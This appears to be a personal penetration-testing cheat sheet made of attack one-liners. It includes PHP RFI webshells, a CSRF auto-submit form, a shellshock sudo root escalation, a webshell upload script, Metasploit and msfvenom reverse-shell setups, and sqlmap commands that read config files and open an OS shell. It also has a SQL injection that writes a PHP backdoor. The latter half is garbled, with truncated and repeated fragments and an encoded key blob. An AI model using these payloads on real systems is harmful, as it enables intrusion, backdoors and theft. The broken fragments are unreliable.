mount -t nfs 192.168.1.72:/home/vulnix /tmp/nfs -nolock
# simple RFI
page=data://text/plain, <?php system("whoami");?>
# mini shell
page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id
# base64 + URL encoded mini shell (didn't work without URL encoding)
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id
-----------------scrf-for-admin-messages---------------
<html>
<body>
<form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
<input type="hidden" name="username" value="spiderman">
<input type="hidden" name="password" value="abc123">
</form>
<script type="text/javascript">
document.changepass.submit();
</script>
</body>
</html>
shell-shock-privelege-escalation
sudo PS1="() { :;} ; /bin/sh" /home/bynarr/lime
devnull' or '1
web_delivery_exploit_windows:
https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery
Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010)
https://vulners.com/exploitdb/EDB-ID:41891?utm_source=telegram&utm_medium=vulnersBot&utm_campaign=subsc
; echo '<?php error_reporting(E_ALL); ini_set(display_errors", 1); $fp = fopen($_POST["name"], "wb"); fwrite($fp, base6
python-upload script
import requests,base64
s = requests.session()
target = "http://10.200.0.104:33447/Challenge/test.php"
f = open('b374k.php')
payload = {
name: "test2.php",
content: base64.b64encode("\n".join(f.readlines()))
}
r = s.post(target, data=payload)
For x in 1466 67 1468 1514 1981 1986; do nmap –Pn –host_timeout 201 –max-retries 0 –p $x 192.168.0.103; done.
lsb_release –a
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.50
set LPORT 1234
set ExitOnSession false
exploit -j -z
https://packetstormsecurity.com/files/139241/vbscan-0.1.7.tar.gz
Linux kernel ptrace/kmod local root exploit/all current 2.2.x and 2.4.x kernels
https://www.win.tue.nl/~aeb/linux/hh/ptrace-kmod-exploit.c
https://www.exploit-db.com/exploits/1198/
http://fuzzysecurity.com/tutorials/16.html
priv esc= half nelson, full nelson, vmsplice and sock sendpage
https://addons.mozilla.org/de/firefox/addon/wappalyzer/
http://tools.kali.org/information-gathering/dotdotpwn
https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/
http://www.howtogeek.com/104337/hacker-geek-os-fingerprinting-with-ttl-and-tcp-window-sizes/
osce::
http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html
Web Payloads
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.php
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.50
set LPORT 1234
set ExitOnSession false
exploit -j -z
-------------------------------------------------------------------------------------------------------------------------------------------------------
8 -e /bin/bash
a reverse shell
etter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
etter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
che2_sites-enabled_000-default
etter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php # Joomla default
| grep -i pass -A 1 -B 1
password=123&Submit=Login" -v 0 --os-shell
password=123&Submit=Login" ' union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#
greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursiver
-udf-for-windows-and-linux/
xpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0Q
m/sploits/debian_ssh_rsa_2048_x86.tar.bz2
xpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0Q
ation-guide/
null-- -&pass=pass&submit=Login&submitted=TRUE
wp-content/uploads/shell.php";
$x 192.168.0.103; done.
PORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
--------------------------------------
ww/bd.php'#
multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space
mVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0a
mVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0a
=subprocess.call(["/bin/sh","-i"]);'
o(),2);p=subprocess.call([“/bin/sh”,”-i”])
utStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String d
utStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String d
2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,vers
EGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc W